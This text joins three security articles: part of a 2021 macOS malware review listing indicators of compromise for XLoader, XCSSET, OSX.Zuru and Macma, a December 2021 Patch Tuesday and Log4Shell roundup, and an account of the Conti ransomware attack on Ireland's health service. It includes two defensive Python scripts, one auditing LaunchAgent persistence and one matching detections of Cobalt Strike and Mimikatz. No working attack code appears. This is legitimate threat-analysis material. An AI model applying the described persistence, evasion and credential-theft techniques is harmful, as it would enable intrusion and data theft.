Also first described in July (this time by CheckPoint) and also cross-platform, XLoader is a Malware-as-a-Service info stealer and keylogger. The Mac version of XLoader is unusual in several regards, but primarily because it is Java-based. Finding Java installs on Macs these days is not a common occurrence; with the exception of people playing Minecraft or researchers using Ghidra, the most common users of Java on macOS are Java developers and certain legacy business and banking applications.

XLoader’s executable is a heavily stripped and obfuscated Mach-O dropped in the User’s Home folder. It also drops a hidden application bundle in the same location containing a copy of itself. It then loads a user LaunchAgent for persistence with the program argument pointing to the hidden app bundle. All file names are randomized and vary from execution to execution. Among other things, XLoader will attempt to steal credentials from Chrome and Firefox browsers.

Detection of XLoader in SentinelOne console

Primary IoCs:

XLoader Mach-O Executable: KIbwf02l
7edead477048b47d2ac3abdc4baef12579c3c348

Suspected Phishing lure attachment: Statement SKBMT 09818.jar
b8c0167341d3639eb1ed2636a56c272dc66546fa

Example Persistence LaunchAgent: com.j85H64iPLnW.rXxHYP
cb3e7ac4e2e83335421f8bbc0cf953cb820e2e27

Notable Characteristics:

  • Infostealer – Input Capture via Keylogger (T1056.001, T1056)
  • Requires JRE runtime to be installed on victim machine
  • Uses Mach-O executables
  • Uses a Launch Agent for persistence (T1543.001)
  • Uses random file names unique for each instance
  • Defense evasion via hidden artifacts (T1564.001)

8. XCSSET Updated

XCSSET malware was initially described by Trend Micro last year, in August 2020. However, the malware has undergone quite a lot of development in that time, and by July 2021 there had certainly been enough changes to warrant revisiting it. Like OSAMiner (See Item 2, above), XCSSET makes heavy use of run-only AppleScripts, and both use the same AppleScript code in their string encryption and decryption routines.

AppleScript string decryption routine used in both XCSSET and OSAMiner malware

At one point, Apple linked OSAMiner and XCSSET together in their XProtect signature file, branding them both part of the same family they called “DubRobber”. That link no longer appears in XProtect, but the code sharing is certainly intriguing. Both malware families appear to be targeting primarily Chinese and Asian macOS users, with some suggestions that XCSSET is aimed at Chinese gambling sites and users.

Despite the similarities noted, XCSSET and OSAMiner share little else in common. XCSSET is vastly more complex and makes use of many different components and TTPs that make it difficult for traditional AV software to detect and easy for the authors to adapt. Among those is the use of shc, a publicly available shell script compiler that makes XCSSET Mach-O binaries opaque to static signature scanning engines like XProtect, meaning the only sure way to catch XCSSET is through behavioral detection.

XCSSET also uses other publicly available projects to replace the user’s browser Dock icon with a fake one that launches the malware whenever the user launches their browser from the Dock. The developers of XCSSET have also used zero-days to bypass privacy protections allowing them to take screen captures by hijacking the entitlements of other apps on the system.

Primary IoCs:

~/Library/Caches/GeoServices/.report
~/Library/Caches/GeoServices/.plist
~/Library/Caches/GeoServices/.domain
~/Library/Caches/GeoServices/AppleKit

Notable Characteristics:

  • Infostealer
  • Uses Run-only AppleScripts (T1059.002)
  • Uses Python executables (T1059.006)
  • Uses SHC shell script compiler to obfuscate shell scripts
  • Uses a Launch Agent for persistence (T1543.001)
  • Attempts to hide as a system process (T1564.001)
  • Replaces Browser Dock Icon
  • Steals user data from Chrome, Contacts, Notes, Opera, Skype and others
  • Injects a payload into the build phase of local Xcode projects
  • Uses a Zero Day

9. OSX.Zuru

In September, macOS malware researcher @codecolorist noticed that sponsored links in the Baidu search engine were spreading malware via trojanized versions of iTerm2. A rapid triage by Patrick Wardle dubbed the malware “OSX.Zuru”. Subsequent investigation revealed that Microsoft’s Remote Desktop for Mac was also being trojanized with the same malware, as were SecureCRT and Navicat.

The selection of trojanized apps is interesting and suggests the threat actor was targeting users of backend tools used for SSH and other remote connections and business database management.

However, given that the only known distribution method to date relies on sponsored web searches, indications are that this is a “shotgun” approach in the hope of hoovering up interesting targets rather than a specifically-targeted campaign.

The threat actor had modified the original application bundles with a malicious dylib in the .app/Contents/Frameworks/ folder called libcrypto.2.dylib. This downloads two further components: a python script dropped at /tmp/g.py and a heavily-obfuscated Mach-O dropped at /private/tmp/GoogleUpdate.

Analysis of this file reveals functionality for surveilling the local environment, reaching out to a C2 server and executing remote commands via a backdoor.

Primary IoCs:

/Applications/iTerm.app/Contents/Frameworks/libcrypto.2.dylib
/Applications/Microsoft Remote Desktop.app/Contents/Frameworks/libcrypto.2.dylib
/private/tmp/GoogleUpdate
/tmp/g.py

Notable Characteristics:

  • Backdoor
  • Uses a Mach-O executable
  • Uses Python (T1059.006)
  • Attempts to disguise itself as GoogleUpdate

10. macOS.Macma

In November, Google’s TAG published details of a threat they labelled macOS.Macma. Macma appears to be APT activity targeting, among others, Mac users visiting Hong Kong websites supporting pro-democracy activism. Both a zero day and an N-day (a known vulnerability with an available patch) were used at various points in the campaign; namely, a remote code execution (RCE) 0-day in WebKit and a local privilege escalation (LPE) in the XNU kernel.

The malware, which appears to date from at least 2019, is delivered in two distinct ways: first, via a trojanized app containing several malicious binaries and a shell script in its Resources folder; and second, by a watering-hole attack on visitors to certain websites.

It primarily functions as a keylogger, screen capturer, and backdoor.

macOS.Macma execution chain as seen in the SentinelOne console

Primary IoCs:

~/Library/LaunchAgents/com.UserAgent.va.plist
~/Library/Preferences/UserAgent/lib/UserAgent
~/Library/Preferences/Tools/arch
~/Library/Preferences/Tools/kAgent
~/Library/Preferences/Tools/at

Notable Characteristics:

  • Infostealer – Input Capture via Keylogger (T1056.001, T1056)
  • Uses a Zero Day
  • Uses a patched vulnerability, targeting users that failed to patch
  • Uses Mach-O executables
  • Uses a Launch Agent for persistence (T1543.001)

What Can We Learn From This Year’s macOS Malware?

It’s been said that the past is no reliable guide to the future (thanks, David Hume!), and that goes double when we are talking about malware trends, but there are certainly some interesting developments this year that we haven’t seen quite so pronounced in the past.

In the malware we’ve seen this year, we note first of all an increasing trend towards cross-platform development. This is something we have observed in the commodity adware market, too. Adload, for example, has been experimenting not only with malware written in Google’s Go language, but also in Kotlin.

Secondly, we note that a significant number of campaigns targeting macOS users either originated from or were targeted towards (or both) Chinese and Asian macOS users. This no doubt reflects a number of factors: the increasing importance of the macOS operating system in Asian markets, and an increasing familiarity with macOS development skills among macOS malware authors either from, or interested in, spying on that part of the world. Note that XCSSET, OSX.Zuru and macOS.Macma in particular show a high level of familiarity with the macOS platform. However, XcodeSpy was discovered in a large, well-known U.S. organization, so it’s certainly not the case that all the recent macOS malware traffic is heading east.

We’ve also seen a number of attacks targeting software developers: XcodeSpy, XCSSET and XLoader all target environments that you might typically find on an enterprise developer’s Mac.

At least three of this year’s ten new malware families were also likely highly-targeted, possibly APT, attacks: XcodeSpy, WildPressure, and macOS.Macma all had very particular targets in mind and do not appear to be primarily financially motivated.

Similarly, the number of malware families whose primary function is espionage – backdoors, RATs, and keyloggers – is notable: 6 out of 10 of this year’s new macOS malware were aimed at spying on or taking over the computers of targets. Of the other four, two were loader platforms and two were related to cryptocurrency: either stealing it or mining it.

While threat actors expand their range of TTPs and seek to leverage known and undiscovered vulnerabilities, it is worth noting that by far the majority continue to rely on exploiting LaunchAgents for persistence. This offers plenty of opportunities for detection and protection. At the same time, security teams are advised to prepare for the possibility that threat actors will soon start to explore less obvious ways to persist.
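The per-user LaunchAgent traits that recur across the families above (com.apple-style labels in ~/Library/LaunchAgents, payloads in hidden dotfiles, scripts launched through an interpreter, staging under /tmp) can be turned into a quick triage check. The script below is an added example, not code from this post or from SentinelOne; every plist, label and path it contains is constructed for illustration.

```python
"""Heuristic audit of per-user LaunchAgent plists.

Added example, not from the post or from SentinelOne. It scores a plist against
traits the post reports across ElectroRAT, OSAMiner, XcodeSpy, WildPressure,
XLoader and Macma: com.apple-style labels in ~/Library/LaunchAgents, payloads in
hidden dotfiles, scripts run through an interpreter, and staging under /tmp.
All sample plists and paths below are constructed.
"""
import plistlib
from pathlib import PurePosixPath

# Interpreters the post shows being used as the agent's program (osascript for
# run-only AppleScripts, python for WildPressure and XCSSET, sh for loaders).
INTERPRETERS = {"python", "python2", "python3", "osascript", "sh", "bash", "zsh"}
# Locations the post's loaders and backdoors used to stage payloads.
STAGING_DIRS = ("/tmp/", "/private/tmp/", "/var/tmp/")


def is_per_user_agent(plist_path: str) -> bool:
    """True for ~/Library/LaunchAgents, false for the system-owned agent dirs."""
    return ("/Library/LaunchAgents/" in plist_path
            and not plist_path.startswith(("/System/", "/Library/")))


def program_arguments(data: dict) -> list:
    """Merge Program and ProgramArguments into one argv-style list of strings."""
    args = [str(a) for a in data.get("ProgramArguments", [])]
    if "Program" in data:
        args.insert(0, str(data["Program"]))
    return args


def launch_agent_findings(plist_path: str, plist_bytes: bytes) -> list:
    """Return finding codes for one plist; [] means no heuristic fired, not 'benign'.

    Codes: label-mimics-apple, interpreter-launch, hidden-path, tmp-staging, unparseable.
    """
    try:
        data = plistlib.loads(plist_bytes)  # XML and binary plists both parse
    except Exception:  # a plist launchd cannot read is still worth a look
        return ["unparseable"]

    findings = []
    label = str(data.get("Label", ""))
    basename = PurePosixPath(plist_path).name
    # Apple ships no per-user agents: a com.apple.* label or filename inside the
    # user's LaunchAgents folder is the masquerade OSAMiner and XcodeSpy used.
    if is_per_user_agent(plist_path) and (
            label.startswith("com.apple") or basename.startswith("com.apple")):
        findings.append("label-mimics-apple")

    args = program_arguments(data)
    if args and PurePosixPath(args[0]).name in INTERPRETERS:
        findings.append("interpreter-launch")
    for arg in args:
        # A dot-prefixed path component is a hidden file or folder (~/.mdworker style).
        if any(p.startswith(".") and p not in (".", "..")
               for p in PurePosixPath(arg).parts):
            findings.append("hidden-path")
            break
    if any(arg.startswith(STAGING_DIRS) for arg in args):
        findings.append("tmp-staging")
    return findings


def build_plist(label: str, args: list) -> bytes:
    """Produce XML plist bytes laid out like a real LaunchAgent file."""
    return plistlib.dumps({"Label": label, "ProgramArguments": args, "RunAtLoad": True})


# Constructed samples modelled on the post's descriptions; the paths are invented.
SAMPLES = {
    "/Users/demo/Library/LaunchAgents/com.apple.FY9.plist":
        build_plist("com.apple.FY9", ["/usr/bin/osascript", "/Users/demo/Library/k.plist"]),
    "/Users/demo/Library/LaunchAgents/mdworker.plist":
        build_plist("mdworker", ["/Users/demo/.mdworker"]),
    "/Users/demo/Library/LaunchAgents/com.apple.pyapple.plist":
        build_plist("com.apple.pyapple", ["/usr/bin/python", "/Users/demo/.appdata/agent.py"]),
    "/Users/demo/Library/LaunchAgents/init_agent.plist":
        build_plist("init_agent", ["/bin/sh", "-c", "/tmp/updater"]),
    "/Users/demo/Library/LaunchAgents/com.example.sync.plist":
        build_plist("com.example.sync",
                    ["/Applications/Example.app/Contents/MacOS/sync", "--daemon"]),
    # The same com.apple label in the system directory is normal and must not fire.
    "/System/Library/LaunchAgents/com.apple.example.plist":
        build_plist("com.apple.example", ["/usr/libexec/example"]),
}


def audit_samples() -> dict:
    """Run the heuristics over SAMPLES; returns {plist path: [finding codes]}."""
    return {path: launch_agent_findings(path, raw) for path, raw in SAMPLES.items()}


if __name__ == "__main__":
    for path, codes in audit_samples().items():
        print(f"{path}: {', '.join(codes) or 'no findings'}")
```

On a live host the same function can be fed the bytes of each file under ~/Library/LaunchAgents; a hit is a prompt to inspect the referenced program, not a verdict on its own.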

Conclusion

For enterprises running macOS fleets, the message from this year’s malware discoveries is clear: threat actors are becoming increasingly interested in the macOS platform, are more familiar with how to exploit it, and are interested in high-value targets.

It is imperative for all security teams to prepare to defend against increasing numbers of increasingly sophisticated attacks on the Mac platform. SentinelOne and SentinelLabs have published several ebooks to help Mac admins, IT teams and security administrators further understand the risks and fortify their defenses; these include A Guide to macOS Threat Hunting and Incident Response and The Complete Guide to Understanding Apple Mac Security for Enterprise. Analysts may also wish to consult our How To Reverse Malware on macOS ebook as well as the SentinelLabs series of posts on reversing macOS malware with radare2.

The Complete Guide to Understanding Apple Mac Security for Enterprise
Learn how to secure macOS devices in the enterprise with this in-depth review of the strengths and weaknesses of Apple’s security technologies.

If you would like to learn more about how SentinelOne can help protect your Mac fleet, contact us for more information or request a free demo.

Microsoft Patch Tuesday, December 2021 Edition

Microsoft, Adobe, and Google all issued security updates to their products today. The Microsoft patches include six previously disclosed security flaws, and one that is already being actively exploited. But this month’s Patch Tuesday is overshadowed by the “Log4Shell” 0-day exploit in a popular Java library that web server administrators are now racing to find and patch amid widespread exploitation of the flaw.

Log4Shell is the name picked for a critical flaw disclosed Dec. 9 in the popular logging library for Java called “log4j,” which is included in a huge number of Java applications. Publicly released exploit code allows an attacker to force a server running a vulnerable log4j library to execute commands, such as downloading malicious software or opening a backdoor connection to the server.

According to researchers at Lunasec, many, many services are vulnerable to this exploit.

“Cloud services like Steam, Apple iCloud, and apps like Minecraft have already been found to be vulnerable,” Lunasec wrote. “Anybody using Apache Struts is likely vulnerable. We’ve seen similar vulnerabilities exploited before in breaches like the 2017 Equifax data breach. An extensive list of responses from impacted organizations has been compiled here.”

“If you run a server built on open-source software, there’s a good chance you are impacted by this vulnerability,” said Dustin Childs of Trend Micro’s Zero Day Initiative. “Check with all the vendors in your enterprise to see if they are impacted and what patches are available.”

Part of the difficulty in patching against the Log4Shell attack is identifying all of the vulnerable web applications, said Johannes Ullrich, an incident handler and blogger for the SANS Internet Storm Center. “Log4Shell will continue to haunt us for years to come. Dealing with log4shell will be a marathon,” Ullrich said. “Treat it as such.” SANS has a good walk-through of how simple yet powerful the exploit can be.

John Hultquist, vice president of intelligence analysis at Mandiant, said the company has seen Chinese and Iranian state actors leveraging the log4j vulnerability, and that the Iranian actors are particularly aggressive, having taken part in ransomware operations that may be primarily carried out for disruptive purposes rather than financial gain.

“We anticipate other state actors are doing so as well, or preparing to,” Hultquist said. “We believe these actors will work quickly to create footholds in desirable networks for follow-on activity, which may last for some time. In some cases, they will work from a wish list of targets that existed long before this vulnerability was public knowledge. In other cases, desirable targets may be selected after broad targeting.”

Researcher Kevin Beaumont had a more lighthearted take on Log4Shell via Twitter:

“Basically the perfect ending to cybersecurity in 2021 is a 90s style Java vulnerability in an open source module, written by two volunteers with no funding, used by large cybersecurity vendors, undetected until Minecraft chat got pwned, where nobody knows how to respond properly.”

A half-dozen of the vulnerabilities addressed by Microsoft today earned its most dire “critical” rating, meaning malware or miscreants could exploit the flaws to gain complete, remote control over a vulnerable Windows system with little or no help from users.

The Windows flaw already seeing active exploitation is CVE-2021-43890, which is a “spoofing” bug in the Windows AppX installer on Windows 10. Microsoft says it is aware of attempts to exploit this flaw using specially crafted packages to implant malware families like Emotet, Trickbot, and BazaLoader.

Kevin Breen, director of threat research for Immersive Labs, said CVE-2021-43905 stands out of this month’s patch batch.

“Not only for its high CVSS score of 9.6, but also because it’s noted as ‘exploitation more likely’,” Breen observed.

Microsoft also patched CVE-2021-43883, an elevation of privilege vulnerability in Windows Installer.

“This appears to be a fix for a patch bypass of CVE-2021-41379, another elevation of privilege vulnerability in Windows Installer that was reportedly fixed in November,” Satnam Narang of Tenable points out. “However, researchers discovered that fix was incomplete, and a proof-of-concept was made public late last month.”

Google issued five security fixes for Chrome, including one rated critical and three others with high severity. If you’re browsing with Chrome, keep a lookout for when you see an “Update” tab appear to the right of the address bar. If it’s been a while since you closed the browser, you might see the Update button turn from green to orange and then red. Green means an update has been available for two days; orange means four days have elapsed, and red means your browser is a week or more behind on important updates. Completely close and restart the browser to install any pending updates.

Also, Adobe issued patches to correct more than 60 security flaws in a slew of products, including Adobe Audition, Lightroom, Media Encoder, Premiere Pro, Prelude, Dimension, After Effects, Photoshop, Connect, Experience Manager and Premiere Rush.

Standard disclaimer: Before you update Windows, please make sure you have backed up your system and/or important files. It’s not uncommon for a Windows update package to hose one’s system or prevent it from booting properly, and some updates have been known to erase or corrupt files.

So do yourself a favor and backup before installing any patches. Windows 10 even has some built-in tools to help you do that, either on a per-file/folder basis or by making a complete and bootable copy of your hard drive all at once.

And if you wish to ensure Windows has been set to pause updating so you can back up your files and/or system before the operating system decides to reboot and install patches on its own schedule, see this guide.

If you experience glitches or problems installing any of these patches this month, please consider leaving a comment about it below; there’s a decent chance other readers have experienced the same and may chime in here with useful tips.

Additional reading:

SANS ISC listing of each Microsoft vulnerability patched today, indexed by severity and affected component.

Inside Ireland’s Public Healthcare Ransomware Scare

The consulting firm PricewaterhouseCoopers recently published lessons learned from the disruptive and costly ransomware attack in May 2021 on Ireland’s public health system. The unusually candid post-mortem found that nearly two months elapsed between the initial intrusion and the launching of the ransomware. It also found affected hospitals had tens of thousands of outdated Windows 7 systems, and that the health system’s IT administrators failed to respond to multiple warning signs that a massive attack was imminent.

PWC’s timeline of the days leading up to the deployment of Conti ransomware on May 14.

Ireland’s Health Service Executive (HSE), which operates the country’s public health system, got hit with Conti ransomware on May 14, 2021. A timeline in the report (above) says the initial infection of the “patient zero” workstation happened on Mar. 18, 2021, when an employee on a Windows computer opened a booby-trapped Microsoft Excel document in a phishing email that had been sent two days earlier.

Less than a week later, the attacker had established a reliable backdoor connection to the employee’s infected workstation. After infecting the system, “the attacker continued to operate in the environment over an eight week period until the detonation of the Conti ransomware on May 14, 2021,” the report states.

According to PWC’s report (PDF), there were multiple warning signs about a serious network intrusion, but those red flags were either misidentified or not acted on quickly enough:

  • On Mar. 31, 2021, the HSE’s antivirus software detected the execution of two software tools commonly used by ransomware groups — Cobalt Strike and Mimikatz — on the Patient Zero Workstation. But the antivirus software was set to monitor mode, so it did not block the malicious commands.
  • On May 7, the attacker compromised the HSE’s servers for the first time, and over the next five days the intruder would compromise six HSE hospitals. On May 10, one of the hospitals detected malicious activity on its Microsoft Windows Domain Controller, a critical “keys to the kingdom” component of any Windows enterprise network that manages user authentication and network access.
  • On 10 May 2021, security auditors first identified evidence of the attacker compromising systems within Hospital C and Hospital L. Hospital C’s antivirus software detected Cobalt Strike on two systems but failed to quarantine the malicious files.
  • On May 13, the HSE’s antivirus security provider emailed the HSE’s security operations team, highlighting unhandled threat events dating back to May 7 on at least 16 systems. The HSE Security Operations team requested that the Server team restart servers.

By then it was too late. At just after midnight Ireland time on May 14, the attacker executed the Conti ransomware within the HSE. The attack disrupted services at several Irish hospitals and resulted in the near complete shutdown of the HSE’s national and local networks, forcing the cancellation of many outpatient clinics and healthcare services. The number of appointments in some areas dropped by up to 80 percent.
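As an added illustration (not from the PWC report or from KrebsOnSecurity): a small Python triage check over constructed antivirus telemetry that surfaces detections of post-exploitation tooling which were logged but never contained, the kind of alert the HSE’s monitor-mode antivirus produced on Mar. 31 and May 7 and that then sat unhandled for days. The hostnames, timestamps and log format are all made up for the example.

```python
from datetime import datetime, timedelta

# Constructed sample antivirus telemetry (not HSE data): timestamp | host | detection | action.
# "detected" means the product logged the event but, as in monitor mode, did nothing about it.
SAMPLE_EVENTS = """\
2021-03-31T09:12:00 | WS-PATIENT0 | CobaltStrike/Beacon | detected
2021-03-31T09:12:05 | WS-PATIENT0 | Mimikatz            | detected
2021-05-07T14:03:00 | SRV-C-01    | CobaltStrike/Beacon | detected
2021-05-10T11:20:00 | SRV-L-02    | CobaltStrike/Beacon | quarantined
2021-05-12T08:45:00 | WS-ACCT-17  | Adware.Generic      | quarantined
"""

# Actions that actually contained the threat; anything else leaves the file in place.
TERMINAL_ACTIONS = {"quarantined", "blocked", "removed"}
# Post-exploitation tooling whose presence signals hands-on-keyboard activity, not adware.
HIGH_SEVERITY = ("cobaltstrike", "mimikatz")


def parse_events(text):
    """Parse the pipe-delimited constructed log format into dicts."""
    events = []
    for line in text.strip().splitlines():
        ts, host, name, action = [p.strip() for p in line.split("|")]
        events.append({"ts": datetime.fromisoformat(ts), "host": host,
                       "name": name, "action": action.lower()})
    return events


def unhandled_detections(events, now, max_age=timedelta(hours=4)):
    """High-severity detections that were never contained and are older than max_age."""
    stale = []
    for e in events:
        if e["action"] in TERMINAL_ACTIONS:
            continue
        if not any(tool in e["name"].lower() for tool in HIGH_SEVERITY):
            continue
        age = now - e["ts"]
        if age > max_age:
            stale.append({**e, "age_hours": int(age.total_seconds() // 3600)})
    # Oldest first: the longest-dwelling intruder gets the first responder.
    return sorted(stale, key=lambda e: -e["age_hours"])


def triage(text, now_iso):
    """Convenience wrapper: returns (stale detections, distinct affected hosts)."""
    stale = unhandled_detections(parse_events(text), datetime.fromisoformat(now_iso))
    return stale, sorted({e["host"] for e in stale})


if __name__ == "__main__":
    stale, hosts = triage(SAMPLE_EVENTS, "2021-05-13T09:00:00")
    print(f"{len(stale)} unhandled high-severity detections on {len(hosts)} hosts")
    for e in stale:
        print(f"  {e['host']:<12} {e['name']:<20} dwell {e['age_hours']}h")
```

Run against the sample on the morning of May 13, the check reports the Mar. 31 workstation detections with roughly six weeks of dwell time and the May 7 server detection with almost six days, while the quarantined events are correctly ignored.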

Conti initially demanded USD $20 million worth of virtual currency in exchange for a digital key to unlock HSE servers compromised by the group. But perhaps in response to the public outcry over the HSE disruption, Conti reversed course and gave the HSE the decryption keys without requiring payment.

Still, the work to restore infected systems would take months. The HSE ultimately enlisted members of the Irish military to bring in laptops and PCs to help restore computer systems by hand. It wasn’t until September 21, 2021 that the HSE declared 100 percent of its servers were decrypted.

As bad as the HSE ransomware attack was, the PWC report emphasizes that it could have been far worse. For example, it is unclear how much data would have been unrecoverable if a decryption key had not become available as the HSE’s backup infrastructure was only periodically backed up to offline tape.

The attack also could have been worse, the report found:

  • if there had been intent by the Attacker to target specific devices within the HSE environment (e.g. medical devices);
  • if the ransomware took actions to destroy data at scale;
  • if the ransomware had auto-propagation and persistence capabilities, for example by using an exploit to propagate across domains and trust-boundaries to medical devices (e.g. the EternalBlue exploit used by the WannaCry and NotPetya attacks);
  • if cloud systems had also been encrypted, such as the COVID-19 vaccination system.

The PWC report contains numerous recommendations, most of which center around hiring new personnel to lead the organization’s redoubled security efforts. But it is clear that the HSE has an enormous amount of work ahead to grow in security maturity. For example, the report notes the HSE’s hospital network had over 30,000 Windows 7 workstations that were deemed end of life by the vendor.

“The HSE assessed its cybersecurity maturity rating as low,” PWC wrote. “For example, they do not have a CISO or a Security Operations Center established.”

PWC also estimates that efforts to build up the HSE’s cybersecurity program to the point where it can rapidly detect and respond to intrusions are likely to cost “a multiple of the HSE’s current capital and operation expenditure in these areas over several years.”

One idea of a “security maturity” model.

In June 2021, the HSE’s director general said the recovery costs for the May ransomware attack were likely to exceed USD $600 million.

What’s remarkable about this incident is that the HSE is publicly funded by the Irish government, and so in theory it has the money to spend (or raise) to pay for all these ambitious recommendations for increasing their security maturity.

That stands in stark contrast to the healthcare system here in the United States, where the single biggest impediment to doing security well continues to be the failure to make it a real budget priority. Also, most healthcare organizations in the United States are private companies that operate on razor-thin profit margins.

I know this because in 2018 I was asked to give the keynote at an annual gathering of the Healthcare Information Sharing and Analysis Group (H-ISAC), an industry group centered on sharing information about cybersecurity threats. I almost didn’t accept the invitation: I’d written very little about healthcare security, which seemed to be dominated by coverage of whether healthcare organizations complied with the letter of the law in the United States. That compliance centered on the Health Insurance Portability and Accountability Act (HIPAA), which prioritizes protecting the integrity and privacy of patient data.

To get up to speed, I interviewed over a dozen of the healthcare security industry’s best and brightest minds. A common refrain I heard from those interviewed was that if it was security-related but didn’t have to do with compliance, there probably wasn’t much chance it would get any budget.

Those sources unanimously said that however well-intentioned, it’s not clear that the “protect the data” regulatory approach of HIPAA was working from an overall threat perspective. According to HealthcareIT News, more than 40 million patient records have been compromised in incidents reported to the federal government in 2021 so far alone.

During my 2018 talk, I tried to emphasize the primary importance of being able to respond quickly to intrusions. Here’s a snippet of what I told that H-ISAC audience:

“The term ‘Security Maturity’ refers to the street smarts of an individual or organization, and this maturity generally comes from making plenty of mistakes, getting hacked a lot, and hopefully learning from each incident, measuring response times, and improving.

Let me say up front that all organizations get hacked. Even ones that are doing everything right from a security perspective get hacked probably every day if they’re big enough. By hacked I mean someone within the organization falls for a phishing scam, or clicks a malicious link and downloads malware. Because let’s face it, it only takes one screw up for the hackers to get a foothold in the network.

Now this in itself isn’t bad. Unless you don’t have the capability to detect it and respond quickly. And if you can’t do that, you run the serious risk of having a small incident metastasize into a much larger problem.

Think of it like the medical concept of the ‘Golden Hour:’ That short window of time directly following a traumatic injury like a stroke or heart attack in which life-saving medicine and attention is likely to be most effective. The same concept holds true in cybersecurity, and it’s exactly why so many organizations these days are placing more of their resources into incident response, instead of just prevention.”

The United States’ somewhat decentralized healthcare system means that many ransomware outbreaks tend to be limited to regional or local healthcare facilities. But a well-placed ransomware attack or series of attacks could inflict serious damage on the sector: A December 2020 report from Deloitte says the top 10 health systems now control 24 percent market share and their revenue grew at twice the rate of the rest of the market.

In October 2020, KrebsOnSecurity broke the story that the FBI and U.S. Department of Homeland Security had obtained chatter from a top ransomware group which warned of an “imminent cybercrime threat to U.S. hospitals and healthcare providers.” Members associated with the Russian-speaking ransomware group known as Ryuk had discussed plans to deploy ransomware at more than 400 healthcare facilities in the United States.

Hours after that piece ran, I heard from a respected H-ISAC security professional who questioned whether it was worth getting the public so riled up. The story had been updated multiple times throughout the day, and there were at least five healthcare organizations hit with ransomware within the span of 24 hours.

“I guess it would help if I understood what the baseline is, like how many healthcare organizations get hit with ransomware on average in one week?” I asked the source.

“It’s more like one a day,” the source confided.

In all likelihood, the HSE will get the money it needs to implement the programs recommended by PWC, however long that takes. I wonder how many U.S.-based healthcare organizations could say the same.